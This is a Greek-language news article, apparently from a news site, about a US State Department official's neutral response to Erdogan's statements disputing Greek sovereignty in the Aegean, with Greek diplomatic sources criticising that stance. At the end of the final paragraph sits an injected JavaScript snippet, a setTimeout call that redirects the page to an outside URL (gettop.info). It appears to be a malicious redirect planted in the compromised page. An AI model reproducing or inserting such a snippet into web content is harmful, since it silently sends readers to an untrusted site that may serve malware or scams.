Ίσες αποστάσεις το Στέιτ Ντιπάρτμεντ για τις δηλώσεις Ερντογάν

0
4

 

Οι ΗΠΑ επέλεξαν να μην λάβουν θέση στις ενέργειες της Τουρκίας και τις εμπρηστικές δηλώσεις του προέδρου της Ταγίπ Ερντογάν, εναντίον της Ελλάδας με την αμφισβήτηση της ελληνικής κυριαρχίας στα νησιά του Αιγαίου.

Απαντώντας σε ερώτηση της εφημερίδας «Έθνος» και της ιστοσελίδας mignatiou.com , για την αμφισβήτηση της Συνθήκης της Λωζάννης, αξιωματούχος του Στέιτ Ντιπάρτμεντ, αρχικά παρέπεμψε στην τουρκική κυβέρνηση για περαιτέρω σχολιασμό των δηλώσεων του Ταγίπ Ερντογάν.

Στη συνέχεια πρόσθεσε τα εξής: «Η Τουρκία και η Ελλάδα έχουν επί μακρόν εδραιωμένους διπλωματικούς διαύλους για την αντιμετώπιση των θεμάτων του Αιγαίου. Το Στέιτ Ντιπάρτμεντ ενθαρρύνει την Τουρκία και την Ελλάδα να εργαστούν από κοινού για να διατηρήσουν καλές γειτονικές σχέσεις και να διασφαλίσουν την ειρήνη και την ασφάλεια στην περιοχή. Η σταθερότητα στο Αιγαίο είναι προς το συμφέρον ολόκληρης της περιοχής», τόνισε ο Αμερικανός αξιωματούχος.

Ανεξάρτητες διπλωματικές πηγές μίλησαν για μία μη παραδεκτή δήλωση από την πλευρά των Ηνωμένων Πολιτειών, ιδιαίτερα σε μία δύσκολη στιγμή για την Ελλάδα, σε όλα τα επίπεδα. Τόνισαν ότι η στάση Ποντίου Πιλάτου από την πλευρά της Αμερικής ενθαρρύνει την επιθετικότητα του Ερντογάν, ενός απολυταρχικού και απρόβλεπτου ηγέτη, Σίγουρα, όπως τόνισαν, η «ανεξαρτητοποίηση» της Αμερικής σε αυτό το κρίσιμο θέμα στέλνει λάθος μηνύματα στην Άγκυρα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here